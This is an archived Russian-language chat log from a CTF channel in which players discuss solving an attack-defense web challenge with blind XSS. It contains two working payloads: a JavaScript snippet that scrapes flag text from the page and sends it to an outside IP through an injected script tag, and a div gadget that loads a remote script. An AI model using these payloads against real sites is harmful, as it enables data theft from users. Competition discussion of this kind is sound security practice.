Size: a a a

2021 May 09

AK

Artyom Kadushko in #ctfchat
Мы видели весь трафик, но ничего не работает
источник

R

Rubikoid in #ctfchat
(() => {
console.log('kks with <3')
const flags = Array.from(document.querySelectorAll('p')).map(e => e.innerText).filter(e => e.includes('SAAR')).join(',')
const tag = document.createElement('script')
console.log(tag)
tag.src = `http://10.32.120.2:22222/?data=${flags}`
document.body.appendChild(tag)
})()
источник

R

Rubikoid in #ctfchat
и там хуету в комменты
источник

ㅤK

ㅤ Kekov 🦋 in #ctfchat
HLE as a service
источник

ㅤK

ㅤ Kekov 🦋 in #ctfchat
источник

AK

Artyom Kadushko in #ctfchat
А почему это работает?
источник

R

Rubikoid in #ctfchat
источник

AK

Artyom Kadushko in #ctfchat
Мы пробовали похожую штуку, но они не сработали
источник

g

greg0r0 in #ctfchat
особенности парса JS
источник

g

greg0r0 in #ctfchat
но это на самом деле
источник

g

greg0r0 in #ctfchat
источник

AK

Artyom Kadushko in #ctfchat
Типа, а как вы автоматизировали всю эту штуку?
источник

g

greg0r0 in #ctfchat
ну типо, блайнд xss
источник

A

Anime Boy in #ctfchat
цтф для одноклеточных
источник

g

greg0r0 in #ctfchat
да алерты не работали, но код де факто выполнялся
источник

g

greg0r0 in #ctfchat
почему и как я хз - не мастер CSP тегов
источник

AK

Artyom Kadushko in #ctfchat
Фулл сплоит плиз
источник

g

greg0r0 in #ctfchat
источник

g

greg0r0 in #ctfchat
ну там был сервачок на flask и сплоит кремлебот, который комменты рассылал
источник

g

greg0r0 in #ctfchat
пейлоад скрипта такой
<div id="videoView" data-elem="script" data-src="http://68.183.74.213:22222/static/govno.js"></div>
источник